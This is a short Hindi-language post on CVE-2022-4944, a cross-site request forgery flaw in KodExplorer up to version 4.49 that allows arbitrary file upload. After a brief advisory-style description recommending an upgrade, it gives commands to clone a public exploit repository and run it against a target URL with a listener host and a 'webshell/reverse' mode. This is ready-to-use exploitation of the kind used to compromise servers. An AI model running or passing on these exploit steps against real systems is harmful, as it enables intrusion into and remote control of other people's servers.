
「💥」CVE-2022-4944: KodExplorer <= 4.49 - CSRF से मनमाना फ़ाइल अपलोड

एक कमजोरी, जिसे समस्याग्रस्त के रूप में वर्गीकृत किया गया था, kalcaddle KodExplorer में संस्करण 4.49 तक पाई गई। यह एक अज्ञात भाग को प्रभावित करती है। हेरफेर से क्रॉस-साइट अनुरोध जालसाजी होती है। इस कमजोरी को विशिष्ट रूप से CVE-2022-4944 के रूप में पहचाना गया है। हमला दूरस्थ रूप से शुरू करना संभव है। इसके अलावा, एक शोषण उपलब्ध है। प्रभावित घटक को अपग्रेड करने की अनुशंसा की जाती है।

pip install requests
git clone https://github.com/Brosck/CVE-2022-4944.git
cd CVE-2022-4944
python3 CVE-2022-4944.py -u http://TARGET.TLD/KODExplorer -lh LOCALHOST -m MODE # webshell/reverse mode